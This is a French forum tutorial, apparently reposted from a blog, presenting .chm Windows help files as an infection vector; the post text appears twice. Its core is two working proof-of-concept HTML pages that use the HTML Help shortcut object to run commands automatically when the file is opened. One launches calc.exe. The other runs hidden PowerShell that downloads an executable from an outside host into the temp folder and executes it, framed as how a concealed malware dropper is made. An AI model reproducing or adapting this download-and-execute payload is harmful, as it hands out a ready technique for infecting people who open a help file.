Bonjour à tous,
aujourd’hui nous allons voir un moyen d’infection plutôt intéressant, qui utilise les fichiers .chm. Ces fichiers sont des fichiers d’aide windows, permettant d’avoir une documentation et une aide hors-ligne.
Exemple de fichiers d’aide (.chm) :
Les fichiers .chm sont des fichiers compilés à partir de fichiers html, d’une table des matières et éventuellement d’un index. Vous pouvez trouver la dernière version du compilateur (HTML Help Workshop) ici -> http://www.microsoft.com/en-us/downl....aspx?id=21138
La faille se trouve dans la permission d’exécuter des commandes dans le script. Voici par exemple un script qui lance la calculatrice windows via l’invite de commandes cmd.
Mettez votre fichier .html « infecté » en page d’ouverture et observez le résultat
Ayant accès à l’exécution de script, tout est désormais possible. Ainsi un script qui télécharge et lance un malware est caché est tout à fait faisable... Ici je le fais avec putty.
Voici la vidéo illustrant l'execution du code ci-dessus :
https://youtube.com/watch?v=u5v_AKB2KaA
Conclusion : Faîtes attention à ce que vous ouvrez
Lien original : http://rootsheep.info/2015/03/11/inf...ers-daide-chm/
aujourd’hui nous allons voir un moyen d’infection plutôt intéressant, qui utilise les fichiers .chm. Ces fichiers sont des fichiers d’aide windows, permettant d’avoir une documentation et une aide hors-ligne.
Exemple de fichiers d’aide (.chm) :
______Construction______
Les fichiers .chm sont des fichiers compilés à partir de fichiers html, d’une table des matières et éventuellement d’un index. Vous pouvez trouver la dernière version du compilateur (HTML Help Workshop) ici -> http://www.microsoft.com/en-us/downl....aspx?id=21138
_____Faille_____
La faille se trouve dans la permission d’exécuter des commandes dans le script. Voici par exemple un script qui lance la calculatrice windows via l’invite de commandes cmd.
Code:
<HTML> <TITLE>Launch Calc.exe</TITLE> <HEAD> </HEAD> <BODY> <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=",cmd.exe, /c calc.exe"> <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> <A name=contents> <H2 align=center>Launch calc.exe with chm files.</H2> <P></A> <H3 ALIGN=CENTER>@RootSheep_Info</H3><P> </BODY> </HTML>
_____Infection_____
Ayant accès à l’exécution de script, tout est désormais possible. Ainsi un script qui télécharge et lance un malware est caché est tout à fait faisable... Ici je le fais avec putty.
Code:
<HTML> <TITLE>CHM Proof Of Concept</TITLE> <HEAD> </HEAD> <BODY> <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=",powershell.exe, -WindowStyle hidden -command (new-object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe',$env:temp+'\test.exe');start-process $env:temp\test.exe"> <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> <A name=contents> <H2 align=center>Download file and run it with chm.</H2> <P></A> <H3 ALIGN=CENTER>@RootSheep_Info</H3><P> </BODY> </HTML>
____Proof of Concept____
Voici la vidéo illustrant l'execution du code ci-dessus :
https://youtube.com/watch?v=u5v_AKB2KaA
Conclusion : Faîtes attention à ce que vous ouvrez
Lien original : http://rootsheep.info/2015/03/11/inf...ers-daide-chm/